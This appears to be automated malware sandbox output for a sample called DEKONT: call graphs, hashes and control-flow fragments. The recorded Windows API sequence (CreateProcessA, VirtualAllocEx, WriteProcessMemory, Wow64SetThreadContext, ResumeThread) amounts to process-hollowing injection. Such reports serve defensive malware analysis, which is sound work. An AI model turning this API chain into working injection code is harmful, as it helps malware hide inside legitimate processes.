7abef4d 2 API calls 50892->50896 50897 7abf03c 2 API calls 50892->50897 50898 7abf093 4 API calls 50892->50898 50899 7abf100 2 API calls 50892->50899 50900 7abf200 2 API calls 50892->50900 50901 7abf0c7 2 API calls 50892->50901 50902 7abf347 2 API calls 50892->50902 50903 7abf527 2 API calls 50892->50903 50904 7abeaf2 50892->50904 50905 7abf606 2 API calls 50892->50905 50893->50873 50894->50904 50895->50904 50896->50904 50897->50904 50898->50904 50899->50904 50900->50904 50901->50904 50902->50904 50903->50904 50904->50873 50905->50904 50907 7abeaea 50906->50907 50908 7abef18 2 API calls 50907->50908 50909 7abf44f 4 API calls 50907->50909 50910 7abef4d 2 API calls 50907->50910 50911 7abf03c 2 API calls 50907->50911 50912 7abf093 4 API calls 50907->50912 50913 7abf100 2 API calls 50907->50913 50914 7abf200 2 API calls 50907->50914 50915 7abf0c7 2 API calls 50907->50915 50916 7abf347 2 API calls 50907->50916 50917 7abf527 2 API calls 50907->50917 50918 7abeaf2 50907->50918 50919 7abf606 2 API calls 50907->50919 50908->50918 50909->50918 50910->50918 50911->50918 50912->50918 50913->50918 50914->50918 50915->50918 50916->50918 50917->50918 50918->50873 50919->50918 50977 7abd588 50920->50977 50981 7abd580 50920->50981 50921 7abf469 50985 7abd498 50921->50985 50989 7abd490 50921->50989 50922 7abf8ca 50928 7abef22 50927->50928 50993 7abdb58 50928->50993 50997 7abdb4c 50928->50997 51001 7abd7c8 50932->51001 51005 7abd7d0 50932->51005 50933 7abf631 50938 7abd7c8 WriteProcessMemory 50936->50938 50939 7abd7d0 WriteProcessMemory 50936->50939 50937 7abefaf 50938->50937 50939->50937 51009 7abd928 50940->51009 51013 7abd921 50940->51013 50941 7abf36c 50945 7abf0e1 50944->50945 50947 7abd498 ResumeThread 50945->50947 50948 7abd490 ResumeThread 50945->50948 50946 7abf8ca 50947->50946 50948->50946 50950 7abf91d 50949->50950 50952 7abd588 Wow64SetThreadContext 50950->50952 50953 7abd580 Wow64SetThreadContext 50950->50953 50951 7abf938 50952->50951 50953->50951 50956 7abf0c6 50954->50956 50955 7abf977 50955->50889 50956->50955 50958 7abd498 ResumeThread 50956->50958 50959 7abd490 ResumeThread 50956->50959 50957 7abf8ca 50958->50957 50959->50957 51017 7abd6a8 50960->51017 51021 7abd6b0 50960->51021 50961 7abf053 50962 7abf074 50961->50962 50965 7abd7c8 WriteProcessMemory 50961->50965 50966 7abd7d0 WriteProcessMemory 50961->50966 50962->50889 50965->50962 50966->50962 50968 7abf042 50967->50968 50970 7abd7c8 WriteProcessMemory 50968->50970 50971 7abd7d0 WriteProcessMemory 50968->50971 50969 7abf074 50969->50889 50970->50969 50971->50969 50973 7abef53 50972->50973 50974 7abef87 50973->50974 50975 7abdb58 CreateProcessA 50973->50975 50976 7abdb4c CreateProcessA 50973->50976 50974->50889 50975->50974 50976->50974 50978 7abd5d1 Wow64SetThreadContext 50977->50978 50980 7abd649 50978->50980 50980->50921 50982 7abd588 Wow64SetThreadContext 50981->50982 50984 7abd649 50982->50984 50984->50921 50986 7abd4dc ResumeThread 50985->50986 50988 7abd528 50986->50988 50988->50922 50990 7abd4dc ResumeThread 50989->50990 50992 7abd528 50990->50992 50992->50922 50994 7abdbdf CreateProcessA 50993->50994 50996 7abde34 50994->50996 50998 7abdbdf CreateProcessA 50997->50998 51000 7abde34 50998->51000 51002 7abd81c WriteProcessMemory 51001->51002 51004 7abd8b5 51002->51004 51004->50933 51006 7abd81c WriteProcessMemory 51005->51006 51008 7abd8b5 51006->51008 51008->50933 51010 7abd974 ReadProcessMemory 51009->51010 51012 7abd9ec 51010->51012 51012->50941 51014 7abd928 ReadProcessMemory 51013->51014 51016 7abd9ec 51014->51016 51016->50941 51018 7abd6b0 VirtualAllocEx 51017->51018 51020 7abd76c 51018->51020 51020->50961 51022 7abd6f4 VirtualAllocEx 51021->51022 51024 7abd76c 51022->51024 51024->50961 50794 17ad01c 50795 17ad034 50794->50795 50796 17ad08e 50795->50796 50801 5972168 50795->50801 50806 5972158 50795->50806 50811 5972f88 50795->50811 50817 5972f98 50795->50817 50802 597218e 50801->50802 50804 5972f98 2 API calls 50802->50804 50805 5972f88 2 API calls 50802->50805 50803 59721af 50803->50796 50804->50803 50805->50803 50807 5972168 50806->50807 50809 5972f98 2 API calls 50807->50809 50810 5972f88 2 API calls 50807->50810 50808 59721af 50808->50796 50809->50808 50810->50808 50812 5972f98 50811->50812 50813 5972ff7 50812->50813 50823 59731ec 50812->50823 50829 5973120 50812->50829 50834 5973110 50812->50834 50813->50813 50818 5972fc5 50817->50818 50819 5972ff7 50818->50819 50820 5973110 2 API calls 50818->50820 50821 5973120 2 API calls 50818->50821 50822 59731ec 2 API calls 50818->50822 50819->50819 50820->50819 50821->50819 50822->50819 50824 59731aa 50823->50824 50825 59731fa 50823->50825 50839 59731d8 50824->50839 50842 59731c8 50824->50842 50826 59731c0 50826->50813 50831 5973134 50829->50831 50830 59731c0 50830->50813 50832 59731d8 2 API calls 50831->50832 50833 59731c8 2 API calls 50831->50833 50832->50830 50833->50830 50836 597311d 50834->50836 50835 59731c0 50835->50813 50837 59731d8 2 API calls 50836->50837 50838 59731c8 2 API calls 50836->50838 50837->50835 50838->50835 50840 59731e9 50839->50840 50846 5974612 50839->50846 50840->50826 50843 59731d8 50842->50843 50844 59731e9 50843->50844 50845 5974612 2 API calls 50843->50845 50844->50826 50845->50844 50850 5974630 50846->50850 50854 5974640 50846->50854 50847 597462a 50847->50840 50851 5974640 50850->50851 50852 5974689 50851->50852 50853 59746da CallWindowProcW 50851->50853 50852->50847 50853->50852 50855 5974682 50854->50855 50857 5974689 50854->50857 50856 59746da CallWindowProcW 50855->50856 50855->50857 50856->50857 50857->50847 50612 17f4668 50613 17f4684 50612->50613 50614 17f46d7 50613->50614 50618 17f4898 50613->50618 50623 17f4210 50614->50623 50616 17f46f6 50619 17f48bd 50618->50619 50627 17f49a8 50619->50627 50631 17f4998 50619->50631 50624 17f421b 50623->50624 50639 17f5c64 50624->50639 50626 17f7258 50626->50616 50629 17f49cf 50627->50629 50628 17f4aac 50628->50628 50629->50628 50635 17f3e44 50629->50635 50633 17f49a8 50631->50633 50632 17f4aac 50632->50632 50633->50632 50634 17f3e44 CreateActCtxA 50633->50634 50634->50632 50636 17f5e68 CreateActCtxA 50635->50636 50638 17f5f6e 50636->50638 50640 17f5c6f 50639->50640 50643 17f5c84 50640->50643 50642 17f72fd 50642->50626 50644 17f5c8f 50643->50644 50647 17f5cb4 50644->50647 50646 17f73da 50646->50642 50648 17f5cbf 50647->50648 50651 17f5ce4 50648->50651 50650 17f74cd 50650->50646 50652 17f5cef 50651->50652 50654 17f87cb 50652->50654 50658 17fae78 50652->50658 50653 17f8809 50653->50650 50654->50653 50662 17fd099 50654->50662 50668 17fd0a8 50654->50668 50673 17fae9f 50658->50673 50677 17faeb0 50658->50677 50659 17fae8e 50659->50654 50663 17fd050 50662->50663 50665 17fd0a2 50662->50665 50663->50653 50664 17fd0ed 50664->50653 50665->50664 50700 17fd369 50665->50700 50704 17fd378 50665->50704 50669 17fd0c9 50668->50669 50670 17fd0ed 50669->50670 50671 17fd369 4 API calls 50669->50671 50672 17fd378 4 API calls 50669->50672 50670->50653 50671->50670 50672->50670 50674 17faeb0 50673->50674 50680 17faf98 50674->50680 50675 17faebf 50675->50659 50679 17faf98 2 API calls 50677->50679 50678 17faebf 50678->50659 50679->50678 50681 17fafdc 50680->50681 50682 17fafb9 50680->50682 50681->50675 50682->50681 50688 17fb688 50682->50688 50692 17fb677 50682->50692 50683 17fb1fd GetModuleHandleW 50685 17fb23c 50683->50685 50684 17fafd4 50684->50681 50684->50683 50685->50675 50689 17fb69c 50688->50689 50691 17fb6c1 50689->50691 50696 17fa390 50689->50696 50691->50684 50694 17fb688 50692->50694 50693 17fb6c1 50693->50684 50694->50693 50695 17fa390 LoadLibraryExW 50694->50695 50695->50693 50697 17fa397 LoadLibraryExW 50696->50697 50699 17fb964 50697->50699 50699->50691 50701 17fd378 50700->50701 50703 17fd3bf 50701->50703 50708 17fb570 50701->50708 50703->50664 50705 17fd385 50704->50705 50706 17fd3bf 50705->50706 50707 17fb570 4 API calls 50705->50707 50706->50664 50707->50706 50709 17fb57b 50708->50709 50711 17fe148 50709->50711 50712 17fdd08 50709->50712 50711->50711 50713 17fdd13 50712->50713 50714 17f5ce4 4 API calls 50713->50714 50715 17fe1b7 50714->50715 50719 5970040 50715->50719 50725 5970006 50715->50725 50716 17fe1f1 50716->50711 50721 5970171 50719->50721 50722 5970071 50719->50722 50720 597007d 50720->50716 50721->50716 50722->50720 50723 5970f0a CreateWindowExW CreateWindowExW 50722->50723 50724 5970f18 CreateWindowExW CreateWindowExW 50722->50724 50723->50721 50724->50721 50727 5970014 50725->50727 50726 597007d 50726->50716 50727->50726 50728 5970f0a CreateWindowExW CreateWindowExW 50727->50728 50729 5970f18 CreateWindowExW CreateWindowExW 50727->50729 50728->50726 50729->50726 50730 5976e40 50731 5976e6d 50730->50731 50734 5976b48 50731->50734 50733 5976f86 50735 5976b53 50734->50735 50738 5977e70 50735->50738 50737 59784a6 50737->50733 50739 5977e7b 50738->50739 50742 59782b8 50739->50742 50741 5978760 50741->50737 50743 59782c3 50742->50743 50746 5978388 50743->50746 50745 5978fd5 50745->50741 50747 5978393 50746->50747 50750 17f5ce4 4 API calls 50747->50750 50751 17f8509 50747->50751 50748 5979016 50748->50745 50750->50748 50752 17f8515 50751->50752 50754 17f87cb 50752->50754 50755 17fae78 2 API calls 50752->50755 50753 17f8809 50753->50748 50754->50753 50756 17fd099 4 API calls 50754->50756 50757 17fd0a8 4 API calls 50754->50757 50755->50754 50756->50753 50757->50753 51025 59a80e0 51026 59a80e8 FindCloseChangeNotification 51025->51026 51027 59a816d 51026->51027 50858 17fd490 50859 17fd4d6 50858->50859 50863 17fd670 50859->50863 50866 17fd660 50859->50866 50860 17fd5c3 50869 17fb638 50863->50869 50867 17fd69e 50866->50867 50868 17fb638 DuplicateHandle 50866->50868 50867->50860 50868->50867 50870 17fd6d8 DuplicateHandle 50869->50870 50871 17fd69e 50870->50871 50871->50860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb73ce6ac8971bfd48281e34e485a7d197ceb501f0e674f7936b31df34a5b7bd
                                                              • Instruction ID: 40b409d2bdf8a8dc40107342beb724bd8c1c41db5b778e964b3d3f7b35eff829
                                                              • Opcode Fuzzy Hash: eb73ce6ac8971bfd48281e34e485a7d197ceb501f0e674f7936b31df34a5b7bd
                                                              • Instruction Fuzzy Hash: 9172E934A40259CFDB25DB64C884FA9B7B2FF89300F5581EAE5096B761DB31AE81CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2236c87ed9572a7e76387e72daed6529c59f8c6407a0c4a6dec75a37d8c50ad6
                                                              • Instruction ID: 2a15ce5ec27ccadf801bb2ac1786e4f8f899a4eaa72e83a7cc12fe3a7b2e5506
                                                              • Opcode Fuzzy Hash: 2236c87ed9572a7e76387e72daed6529c59f8c6407a0c4a6dec75a37d8c50ad6
                                                              • Instruction Fuzzy Hash: 3672E934A40259CFDB25DB64C884FA9B7B2FF89300F5581EAE5096B761DB31AE80CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16d31e7232b7683df228bed084610d0b8cdb974434609c72b555bcdce92f630c
                                                              • Instruction ID: adc78cb84fda056ff4adffebc813b4cfbc3632ad43e8742c4233ea077899b963
                                                              • Opcode Fuzzy Hash: 16d31e7232b7683df228bed084610d0b8cdb974434609c72b555bcdce92f630c
                                                              • Instruction Fuzzy Hash: C372E834A40259CFDB25DB64C894FA9B7B2FF89300F5581EAE5096B761DB31AE80CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 755b49fd7853fd2607f0275574b00714079ea501598afaf699ab850e2e9e775c
                                                              • Instruction ID: 4f124716e0e88294eaae489a7e97c4841eada4a472cbc7ad1c1f886a1d89253b
                                                              • Opcode Fuzzy Hash: 755b49fd7853fd2607f0275574b00714079ea501598afaf699ab850e2e9e775c
                                                              • Instruction Fuzzy Hash: 59329930B11A068FDB18DB79C554BAEB7F6AF89710F288469E14ADB394CB34E841CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6d652e713594d636b1f2e4c00e387d078e3b56db534b5919d5f41f6bb18b44b
                                                              • Instruction ID: 45a7015fd255763982b760cf2df72fa62ce66d19b8f132585ff5558bb2eb015e
                                                              • Opcode Fuzzy Hash: a6d652e713594d636b1f2e4c00e387d078e3b56db534b5919d5f41f6bb18b44b
                                                              • Instruction Fuzzy Hash: CE42B374A002198FDB24DF68C994B9DB7B2FF89300F5181EAD509AB365DB30AE85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b9e22d95b217f881c8f127261ef4b2f2d2f0e2321890e5ea166c37f355992de
                                                              • Instruction ID: e16f845533037981879d93fc8f01d2f3543ff4bf7f11392a3830ada9f00f6fc0
                                                              • Opcode Fuzzy Hash: 8b9e22d95b217f881c8f127261ef4b2f2d2f0e2321890e5ea166c37f355992de
                                                              • Instruction Fuzzy Hash: 6232A134A012188FDB54DF68C994F99B7B2FF8A300F5181EAD509AB365DB30AE85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 581350f2abd43b2679e125fc515224cb298fd21846fa3ced044f0097fc2f2ab3
                                                              • Instruction ID: eb49ad98485e0b4693feee09b54f9a3a412286c131ae76371407c832e07b89ca
                                                              • Opcode Fuzzy Hash: 581350f2abd43b2679e125fc515224cb298fd21846fa3ced044f0097fc2f2ab3
                                                              • Instruction Fuzzy Hash: C891F5B0E15209DFCB18CFA5D5809DEFBB6FB8A300F20A51AE416B7265D7349946CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff8a2081a20a99481939674a81a0df9dd202fa0c22726c749f894657de01c974
                                                              • Instruction ID: 77f51234df792e287c6f296fa8db97085599d1ea78d68cab2efbdafaa4b7c40c
                                                              • Opcode Fuzzy Hash: ff8a2081a20a99481939674a81a0df9dd202fa0c22726c749f894657de01c974
                                                              • Instruction Fuzzy Hash: 999108B0E15209AFCB18CFE5D5809DEFBB6FB89300F20A51AE416B7265D7349946CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 383063beff95c7f720fb85d30bb311b118509be6980c6373e347dff3ae486013
                                                              • Instruction ID: 88350df24f5d7be1e0418f0851e91da39d6548094c046d05ed699f378a431069
                                                              • Opcode Fuzzy Hash: 383063beff95c7f720fb85d30bb311b118509be6980c6373e347dff3ae486013
                                                              • Instruction Fuzzy Hash: 118110B4E14229DFCB14CFA9D9809EEFBB5FB8A300F10955AD421B7264D7349912CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d40068c9fc42207f3628589f815420e94019a2c09a87324035982d7ccdb7f52
                                                              • Instruction ID: 0b7344c8729543f54168e47c82391c42d9a856f5ce423bce6f7117e6d4c44ffe
                                                              • Opcode Fuzzy Hash: 2d40068c9fc42207f3628589f815420e94019a2c09a87324035982d7ccdb7f52
                                                              • Instruction Fuzzy Hash: 198112B5E10219DFCB14CFA9D980AEEFBB6FB89300F00955AD411A7364E7389916CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50e4027841e27329364ce62016e97ff5a0cca76ddf11e9b2a8162656798071dc
                                                              • Instruction ID: 60e72731f494d396a99dc5adb4ae69f1a9abcc29cbcd67adba2f87f751561e0b
                                                              • Opcode Fuzzy Hash: 50e4027841e27329364ce62016e97ff5a0cca76ddf11e9b2a8162656798071dc
                                                              • Instruction Fuzzy Hash: A441A6B4D012089FDB20CFAAC584BDEFBF4BB49300F20942AE418BB251C7759945CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3ded4f5cf2fade0a27263bf0cbea4fba07912eed5379d1b6475498c7cb642c1
                                                              • Instruction ID: 8dc01f22faca90207b362d7a81c543bb65d0e2b0842738afb6256e36c55253c6
                                                              • Opcode Fuzzy Hash: a3ded4f5cf2fade0a27263bf0cbea4fba07912eed5379d1b6475498c7cb642c1
                                                              • Instruction Fuzzy Hash: 134196B4D0120C9FDB20DFAAD584B9EBBF4BB49700F20942AE418BB251C775A945CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67b31156d0df27144a224fed240d5873c07a1821d8505a4179fe5b6c9639ef39
                                                              • Instruction ID: 747dd1c5eb561305422fb94550275d10919c1327bd131640cbe020381122bdab
                                                              • Opcode Fuzzy Hash: 67b31156d0df27144a224fed240d5873c07a1821d8505a4179fe5b6c9639ef39
                                                              • Instruction Fuzzy Hash: 9C21F9B1D006189BEB18CFABC8457DEFAFBAFC9300F14C06AD51876264DB7409468F90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7abdb4c-7abdbf1 2 7abdc3a-7abdc62 0->2 3 7abdbf3-7abdc0a 0->3 7 7abdca8-7abdcfe 2->7 8 7abdc64-7abdc78 2->8 3->2 6 7abdc0c-7abdc11 3->6 9 7abdc13-7abdc1d 6->9 10 7abdc34-7abdc37 6->10 17 7abdd00-7abdd14 7->17 18 7abdd44-7abde32 CreateProcessA 7->18 8->7 15 7abdc7a-7abdc7f 8->15 11 7abdc1f 9->11 12 7abdc21-7abdc30 9->12 10->2 11->12 12->12 16 7abdc32 12->16 19 7abdca2-7abdca5 15->19 20 7abdc81-7abdc8b 15->20 16->10 17->18 26 7abdd16-7abdd1b 17->26 36 7abde3b-7abdf20 18->36 37 7abde34-7abde3a 18->37 19->7 21 7abdc8f-7abdc9e 20->21 22 7abdc8d 20->22 21->21 25 7abdca0 21->25 22->21 25->19 28 7abdd3e-7abdd41 26->28 29 7abdd1d-7abdd27 26->29 28->18 30 7abdd2b-7abdd3a 29->30 31 7abdd29 29->31 30->30 32 7abdd3c 30->32 31->30 32->28 49 7abdf22-7abdf26 36->49 50 7abdf30-7abdf34 36->50 37->36 49->50 51 7abdf28 49->51 52 7abdf36-7abdf3a 50->52 53 7abdf44-7abdf48 50->53 51->50 52->53 54 7abdf3c 52->54 55 7abdf4a-7abdf4e 53->55 56 7abdf58-7abdf5c 53->56 54->53 55->56 59 7abdf50 55->59 57 7abdf5e-7abdf87 56->57 58 7abdf92-7abdf9d 56->58 57->58 63 7abdf9e 58->63 59->56 63->63
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ABDE1F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 66cd63a37255357bbd79ed1fae17dd040f804c22ea7fc7f39d5aa68a08d5a34a
                                                              • Instruction ID: fc22617c2674d13ba74ece4c4197df04acb5617e5fb2cc0dfcb49c200fcb270a
                                                              • Opcode Fuzzy Hash: 66cd63a37255357bbd79ed1fae17dd040f804c22ea7fc7f39d5aa68a08d5a34a
                                                              • Instruction Fuzzy Hash: F2C136B1E0022E8FDB24DFA4C840BEDBBB5BF49314F0095A9D459B7240DBB49A85CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 64 7abdb58-7abdbf1 66 7abdc3a-7abdc62 64->66 67 7abdbf3-7abdc0a 64->67 71 7abdca8-7abdcfe 66->71 72 7abdc64-7abdc78 66->72 67->66 70 7abdc0c-7abdc11 67->70 73 7abdc13-7abdc1d 70->73 74 7abdc34-7abdc37 70->74 81 7abdd00-7abdd14 71->81 82 7abdd44-7abde32 CreateProcessA 71->82 72->71 79 7abdc7a-7abdc7f 72->79 75 7abdc1f 73->75 76 7abdc21-7abdc30 73->76 74->66 75->76 76->76 80 7abdc32 76->80 83 7abdca2-7abdca5 79->83 84 7abdc81-7abdc8b 79->84 80->74 81->82 90 7abdd16-7abdd1b 81->90 100 7abde3b-7abdf20 82->100 101 7abde34-7abde3a 82->101 83->71 85 7abdc8f-7abdc9e 84->85 86 7abdc8d 84->86 85->85 89 7abdca0 85->89 86->85 89->83 92 7abdd3e-7abdd41 90->92 93 7abdd1d-7abdd27 90->93 92->82 94 7abdd2b-7abdd3a 93->94 95 7abdd29 93->95 94->94 96 7abdd3c 94->96 95->94 96->92 113 7abdf22-7abdf26 100->113 114 7abdf30-7abdf34 100->114 101->100 113->114 115 7abdf28 113->115 116 7abdf36-7abdf3a 114->116 117 7abdf44-7abdf48 114->117 115->114 116->117 118 7abdf3c 116->118 119 7abdf4a-7abdf4e 117->119 120 7abdf58-7abdf5c 117->120 118->117 119->120 123 7abdf50 119->123 121 7abdf5e-7abdf87 120->121 122 7abdf92-7abdf9d 120->122 121->122 127 7abdf9e 122->127 123->120 127->127
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ABDE1F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 2e590538d49c970e4e76a223d27af0c280e4bd6bd7e8d4e4b12f706bd1f79df7
                                                              • Instruction ID: f50fa812556211141fb1567aee45b2daa129fe83c3e9709a0af4143636b36843
                                                              • Opcode Fuzzy Hash: 2e590538d49c970e4e76a223d27af0c280e4bd6bd7e8d4e4b12f706bd1f79df7
                                                              • Instruction Fuzzy Hash: 7BC137B1E0022E8FDB24DFA4C840BEDBBB5BF49314F0095A9D459B7240DB749A85CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 128 17faf98-17fafb7 129 17fafb9-17fafc6 call 17fa32c 128->129 130 17fafe3-17fafe7 128->130 137 17fafdc 129->137 138 17fafc8 129->138 131 17faffb-17fb03c 130->131 132 17fafe9-17faff3 130->132 139 17fb03e-17fb046 131->139 140 17fb049-17fb057 131->140 132->131 137->130 184 17fafce call 17fb688 138->184 185 17fafce call 17fb677 138->185 139->140 141 17fb07b-17fb07d 140->141 142 17fb059-17fb05e 140->142 144 17fb080-17fb087 141->144 145 17fb069 142->145 146 17fb060-17fb067 call 17fa338 142->146 143 17fafd4-17fafd6 143->137 147 17fb118-17fb1e9 143->147 148 17fb089-17fb091 144->148 149 17fb094-17fb09b 144->149 151 17fb06b-17fb079 145->151 146->151 178 17fb1fd-17fb23a GetModuleHandleW 147->178 179 17fb1eb-17fb1fa 147->179 148->149 152 17fb09d-17fb0a5 149->152 153 17fb0a8-17fb0b1 call 17fa348 149->153 151->144 152->153 159 17fb0be-17fb0c3 153->159 160 17fb0b3-17fb0bb 153->160 161 17fb0c5-17fb0cc 159->161 162 17fb0e1-17fb0ee 159->162 160->159 161->162 164 17fb0ce-17fb0de call 17fa358 call 17fa368 161->164 168 17fb111-17fb117 162->168 169 17fb0f0-17fb10e 162->169 164->162 169->168 180 17fb23c-17fb242 178->180 181 17fb243-17fb271 178->181 179->178 180->181 184->143 185->143
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(?), ref: 017FB22A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 3147564a67cfa0fa581f22795031cbc6320173a017a7afb8bf50fadb378c63c3
                                                              • Instruction ID: f53cdc70b701f9337d9796f9b1d3434cd16a2f9cb803e5e0a444e5015820ffc2
                                                              • Opcode Fuzzy Hash: 3147564a67cfa0fa581f22795031cbc6320173a017a7afb8bf50fadb378c63c3
                                                              • Instruction Fuzzy Hash: 4C910170A00B098FDB24DF69D48579AFBF1FF88200F00892EE55AA7750DB75A945CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
